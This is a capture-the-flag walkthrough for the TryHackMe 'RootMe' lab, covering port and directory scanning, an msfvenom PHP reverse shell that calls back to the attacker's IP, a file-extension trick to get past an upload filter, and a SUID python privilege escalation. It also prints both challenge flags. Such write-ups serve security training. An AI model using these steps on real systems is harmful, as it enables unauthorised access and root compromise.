TryHackMe CTF: RootMe

1.  
2. IP: **10.10.187.43**
3.  
4.  
5. ## Reconnaissance
6. #### nmap
7. ```
8. [kali:~]$ sudo nmap -p- 10.10.187.43
9. [sudo] password for kali:
10. Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-07 10:09 EST
11. Nmap scan report for 10.10.187.43
12. Host is up (0.049s latency).
13. Not shown: 65533 closed tcp ports (reset)
14. PORT STATE SERVICE
15. 22/tcp open ssh
16. 80/tcp open http
17.  
18. Nmap done: 1 IP address (1 host up) scanned in 87.43 seconds
19. [kali:~]$ sudo nmap -sC -sV -p22,80 10.10.187.43
20. Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-07 10:11 EST
21. Nmap scan report for 10.10.187.43
22. Host is up (0.043s latency).
23.  
24. PORT STATE SERVICE VERSION
25. 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
26. | ssh-hostkey:
27. | 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
28. | 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
29. |_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
30. 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
31. | http-cookie-flags:
32. | /:
33. | PHPSESSID:
34. |_ httponly flag not set
35. |_http-title: HackIT - Home
36. |_http-server-header: Apache/2.4.29 (Ubuntu)
37. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
38.  
39. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
40. Nmap done: 1 IP address (1 host up) scanned in 9.06 seconds
41. [kali:~]$
42. ```
43. - Found a webserver
44. #### Gobuster
45. ```
46. [kali:~]$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.187.43/
47. ===============================================================
48. Gobuster v3.1.0
49. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
50. ===============================================================
51. [+] Url: http://10.10.187.43/
52. [+] Method: GET
53. [+] Threads: 10
54. [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
55. [+] Negative Status codes: 404
56. [+] User Agent: gobuster/3.1.0
57. [+] Timeout: 10s
58. ===============================================================
59. 2023/03/07 10:16:01 Starting gobuster in directory enumeration mode
60. ===============================================================
61. /uploads (Status: 301) [Size: 314] [--> http://10.10.187.43/uploads/]
62. /css (Status: 301) [Size: 310] [--> http://10.10.187.43/css/]
63. /js (Status: 301) [Size: 309] [--> http://10.10.187.43/js/]
64. /panel (Status: 301) [Size: 312] [--> http://10.10.187.43/panel/]
65. Progress: 7383 / 220561 (3.35%) ^C
66. [!] Keyboard interrupt detected, terminating.
67.  
68. ===============================================================
69. 2023/03/07 10:16:35 Finished
70. ===============================================================
71. ```
72. - Found the file `panel` containing an upload point with `upload` folder exposed
73.  
74. ## Exploiting
75. #### Msfvenom
76. ```
77. [kali:~]$ msfvenom -p php/meterpreter_reverse_tcp LHOST=10.14.36.168 LPORT=4444 -f raw > shell.php
78. To use retry middleware with Faraday v2.0+, install `faraday-retry` gem
79. [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
80. [-] No arch selected, selecting arch: php from the payload
81. No encoder specified, outputting raw payload
82. Payload size: 34789 bytes
83. ```
84. - Created a php shell since the webserver is using php
85. - Changed the extension to `.php5` to evade the detection
86. - Sometimes the application accepts the file but not execute it
87. - Upload it and got a reverse shell with `www-data` user
88.  
89.  
90. ## Priv Esc
91. - Looking for SUID files permission: `find / -user root -perm /4000`
92. - Got a bunch, but the interesting one is `/usr/bin/python`
93. - Went to https://gtfobins.github.io/ and looked for python > SUID
94. - Found this `./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'`
95. - Executed it
96. ```
97. python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
98. ls
99. shell.php3
100. shell1.php3
101. shellfinal
102. shellfinal.PHTML
103. shellfinal.php%00.txt
104. shellfinal.php5
105. shelly.elf
106. shellyy.php3
107. shellyy.sh
108. webshell.php3
109. whoami
110. root
111. cd /root
112. ls
113. root.txt
114. cat root.txt
115. THM{pr1v1l3g3_3sc4l4t10n}
116. ```
117.  
118. ## Flags
119. - User: `THM{y0u_g0t_a_sh3ll}`
120. - Root: `THM{pr1v1l3g3_3sc4l4t10n}`
121.  
122. This paste owned by https://linktr.ee/a7.acc